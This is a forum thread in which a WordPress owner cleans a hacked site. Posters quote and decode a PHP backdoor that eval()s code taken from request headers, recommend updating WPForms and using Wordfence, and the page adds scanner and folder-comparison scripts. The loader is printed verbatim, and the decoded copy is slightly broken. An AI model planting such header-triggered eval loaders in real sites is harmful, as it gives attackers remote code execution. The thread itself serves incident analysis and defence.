
Wordpress site hacked

did not sound like you knew that.
them how would I have found them in the first place? I even stated that they were off the 80-char screen, on the far right, so obviously I knew they were there
 
You can call BS all you want. I am not the one that got hacked twice.

I run them to try them out; if I like them, then I purchase them to support the authors.
No worries... you did try to help and I appreciate your advice but I gotta tell you, I also have a local test environment and it too can get infected. But like I said, no worries, thank you for your help
 
Yes it can; it runs on a separate VLAN with all traffic blocked except to my IP.

Also, show us a list of plugins; maybe we know of one that has had a security issue that could cause this.
 
NEVER MIND - THE CODE WAS ALREADY ANSWERED ABOVE.... PLS IGNORE

So can anyone decode this text? It was at the top of a lot of infected files.
I tried Ctrl-V to insert the text inside a quote tag, but it wouldn't let me, so I attached it as a text file.
 

Attachments

  • hacker.txt (928 bytes)
Code:
    $c = "@eval($_REQUEST["If-Unmodified-Since\"]);@eval($_HEADERS["If-Unmodified-Since"]);";

    $_HEADERS = getallheaders();if(isset($_HEADERS['If-Modified-Since'])){$c="@eval($_REQUEST["Clear-Site-Data"]);@eval($_HEADERS["Clear-Site-Data"]);";$f='/tmp/.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);}
 
Here is the file decrypted

PHP:
    $_HEADERS = getallheaders();
    if (isset($_HEADERS['X-Dns-Prefetch-Control'])) {
        $c = "@eval($_REQUEST["If-Unmodified-Since\"]);@eval($_HEADERS["If-Unmodified-Since"]);";
        $f = .time();
        file_put_contents($f, $c);
        include($f);
        unlink($f);
    }
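As an added example (not code from the thread or from any plugin): a small defender-side scanner that looks for the pieces of the loader decoded above (getallheaders(), a header-keyed isset(), eval() of request or header data, and the write/include/unlink chain) across a plugin tree. The plugin paths and file contents in demo() are constructed samples.

```python
import os, re, tempfile

# Each pattern is one piece of the backdoor quoted in the thread, matched
# loosely so whitespace changes and the "@" suppression operator do not hide it.
INDICATORS = {
    "headers_read": re.compile(r"getallheaders\s*\(\s*\)"),
    "header_trigger": re.compile(r"isset\s*\(\s*\$_HEADERS\s*\["),
    "eval_of_input": re.compile(r"eval\s*\(\s*\$_(?:REQUEST|HEADERS|GET|POST|COOKIE)\s*\["),
    "drop_include_unlink": re.compile(r"file_put_contents\b.*?\binclude\b.*?\bunlink\b", re.S),
}

def score_source(src: str) -> dict:
    """Count how often each indicator appears in one PHP file's contents."""
    return {name: len(rx.findall(src)) for name, rx in INDICATORS.items()}

def is_suspicious(src: str) -> bool:
    """eval() of request or header data is enough on its own; otherwise require
    the write-include-delete chain together with a read of the request headers."""
    hits = score_source(src)
    return hits["eval_of_input"] > 0 or (
        hits["drop_include_unlink"] > 0 and hits["headers_read"] > 0)

def scan_tree(root: str) -> list:
    """Return sorted relative paths of .php files under root that match."""
    flagged = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(".php"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if is_suspicious(fh.read()):
                        flagged.append(os.path.relpath(path, root))
    return sorted(flagged)

# Constructed samples (not real files from the thread): a benign plugin file
# and one carrying the header-triggered write/include/unlink loader seen above.
CLEAN_PHP = "<?php\nadd_action('init', function () { wp_enqueue_script('lazy'); });\n"
INFECTED_PHP = ("<?php $_HEADERS = getallheaders();if(isset($_HEADERS['If-Modified-Since']))"
                "{$c='...';$f='/tmp/.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);}\n")

def demo() -> list:
    """Write the two samples into a throwaway plugin tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in (("wp-content/plugins/lazy-load/lazy-load.php", CLEAN_PHP),
                          ("wp-content/plugins/lazy-load/wp-lazyload.php", INFECTED_PHP)):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)
```

Any hit is a file to inspect by hand and diff against a clean download, not proof of compromise on its own.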

Would you help me by showing how you decoded that string?
 
@Sebrof each cron entry is attached to a plugin. You may get a copy of them on your local computer and check them one by one.
Redownload all sources from where you got them, then compare them with the ones on your site.
If all are clean or identical to the original downloaded files, then get the full WordPress folder and compare it with the original version of WordPress downloaded from wordpress.org.
Somewhere a file has been edited to include a malicious script that is running through cron.

Will each plugin have its own folder with its cron entry?

The plugins on the site, if they are nulled, came from here and are at least one year old. I always balked at updating a nulled script if it seemed to be working fine. Maybe I should redownload the latest and then reinstall. The one that at this point seems sketchy is WPFORM.
 
A good idea would be to check your plugins and their versions against a public vulnerability database. You'll find out that some previous versions are vulnerable to different types of attacks and that they were patched in newer versions.
WPforms is one of the most vulnerable plugins.
 
Here is a suspicious plugin that I don't remember installing:
wp-lazyload-AMjRzLNlt3HSvce0-module
It has one file in it called: wp-lazyload.php
Attached - I renamed it to .txt; it is actually a .php
 
Wordfence is doing a great job of blocking logins, but I have no idea what criteria it is using to do these blocks. I haven't set up any "blocking" criteria. How does it know which logins are to be blocked?
 
 
WPForm has had quite a few vulnerabilities and could be the culprit. The other one you stated is a lazy loader plugin; not sure why it has all the extra characters in it, as I do not use it.

What version was the WPForm?

1.5.82
1.5.9
1.7.7
and several other versions have cross-site scripting or authentication cross-site vulnerabilities, and some also have SQL injection vulnerabilities.

And like Custom B stated, Wordfence Premium is the way to go, not the nulled version. This way it gets updated (I think twice a day) with new definitions and IP blocks.
 
Updated wpforms to the latest, now updating the rest of the plugins. Site seems to have calmed down except for a crapload of login attempts, all blocked by Wordfence.
 
You will always have login attempts since it is WordPress. WordPress is one of the most attacked CMSes there is.

If you are on a dedicated server or a VPS, you can block and control more aspects of everything; if shared, you are very limited, so you have to do what you can to protect your site. Starting off with Wordfence is a very good choice, especially if you went premium. I know yesterday they sent out an email about the WooCommerce Payments plugin with a critical bypass takeover. They are always on top of things.

Wish you the best of luck to not get hacked again, keep the mods updated!
 
I finally got the site 100% clean... wpforms was the main issue... if I had just updated it, any bad files with different names than those in the core would still be there, so to be safe, I renamed WPFORMS to kill_wpForms, then re-installed a fresh wpforms, then compared the folders and yep, just as I suspected, extra files in the original that would still be there had I just re-installed over the old installation.

Now the scan results look like this: (finally)

1679695766245.png

Thx for all the help from everyone... what a mess I had - would still be like that without the help of this site - another donation about to be processed
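The comparison suggested earlier in the thread (re-download the plugin or WordPress core and compare it with the live copy) and the manual folder comparison in this post, as an added example rather than anything posted in the thread: hash both trees and list extra, modified and missing files, since re-installing over the old folder leaves dropped files in place. The wpforms.php/includes paths and file contents are constructed placeholders, not the real plugin's layout.

```python
import hashlib, os, tempfile

def tree_digests(root: str) -> dict:
    """Map each file's path relative to root to its SHA-256 hex digest."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                out[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out

def compare_trees(installed: str, reference: str) -> dict:
    """extra: only in the installed copy (where leftover dropped files hide);
    modified: in both but contents differ; missing: only in the clean reference."""
    cur, ref = tree_digests(installed), tree_digests(reference)
    return {
        "extra": sorted(set(cur) - set(ref)),
        "modified": sorted(p for p in set(cur) & set(ref) if cur[p] != ref[p]),
        "missing": sorted(set(ref) - set(cur)),
    }

def _write(root: str, rel: str, body: str) -> None:
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(body)

def demo() -> dict:
    """Constructed scenario (not real plugin contents): the clean download has
    two files; the installed copy has one edited file and one injected extra."""
    with tempfile.TemporaryDirectory() as ref, tempfile.TemporaryDirectory() as cur:
        _write(ref, "wpforms.php", "<?php // plugin bootstrap\n")
        _write(ref, "includes/class-form.php", "<?php class WPForms_Form {}\n")
        _write(cur, "wpforms.php", "<?php // plugin bootstrap\n")
        _write(cur, "includes/class-form.php", "<?php /* edited */ class WPForms_Form {}\n")
        _write(cur, "includes/.cache.php", "<?php // not in the clean download\n")
        return compare_trees(cur, ref)
```

Run compare_trees() with the live wp-content/plugins/<plugin> folder and a freshly unzipped copy of the same version; a non-empty "extra" list is exactly the leftover-file problem described above.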
 
Glad you got it all fixed up!
 